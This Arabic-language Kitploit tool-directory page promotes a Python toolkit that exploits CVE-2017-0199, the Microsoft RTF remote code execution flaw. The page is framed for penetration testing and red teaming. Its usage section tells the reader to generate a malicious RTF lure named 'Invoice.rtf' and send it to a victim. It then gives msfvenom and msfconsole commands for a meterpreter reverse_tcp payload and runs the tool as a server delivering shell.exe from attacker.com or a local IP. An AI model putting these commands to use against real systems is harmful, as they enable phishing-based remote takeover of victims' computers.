Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/n1shant-sinha/cve-2017-0199
أطر الاستغلالتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubn1shant-sinha/cve-2017-0199

CVE-2017-0199

أداة استغلال CVE-2017-0199 - v2.0 هي نص برمجي مفيد بلغة بايثون يوفر طريقة سريعة وفعالة لاستغلال ثغرة Microsoft RTF RCE. يمكنها إنشاء ملف RTF خبيث وتسليم حمولة metasploit / meterpreter إلى الضحية دون الحاجة إلى أي إعدادات معقدة.

عرض المستودع
241منذ 9 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-0199

أداة الاستغلال CVE-2017-0199 - v2.0 هي سكربت Python عملي يوفر طريقة سريعة وفعالة لاستغلال ثغرة RCE في Microsoft RTF. يمكنها إنشاء ملف RTF خبيث وتوصيل حمولة metasploit / meterpreter إلى الضحية دون أي إعدادات معقدة.

ملاحظة الإصدار:

تمت إضافة الإمكانيات التالية إلى السكربت

  • توليد ملف RTF خبيث باستخدام الأداة
  • تشغيل الأداة في وضع الاستغلال كخادم HTA صغير + خادم ويب الإصدار: إصدار Python 2.7.13

مثال:

الخطوة 1: قم بتوليد ملف RTF خبيث باستخدام الأمر التالي وأرسله إلى الضحية

الصيغة:

python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u http://attacker.com/test.hta

مثال:

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.133.128/logo.doc

الخطوة 2 (اختياري، إذا كنت تستخدم حمولة MSF) : قم بتوليد حمولة metasploit وبدء المعالج

مثال:

توليد الحمولة:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe

بدء المعالج:

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.133.128; run"

الخطوة 3: قم بتشغيل الأداة في وضع الاستغلال لتوصيل الحمولات

الصيغة:

python cve-2017-0199_toolkit.py -M exp -e http://attacker.com/shell.exe -l </tmp/shell.exe>

مثال:

python cve-2017-0199_toolkit.py -M exp -e http://192.168.133.128/shell.exe -l /tmp/shell.exe

تنزيل الأداة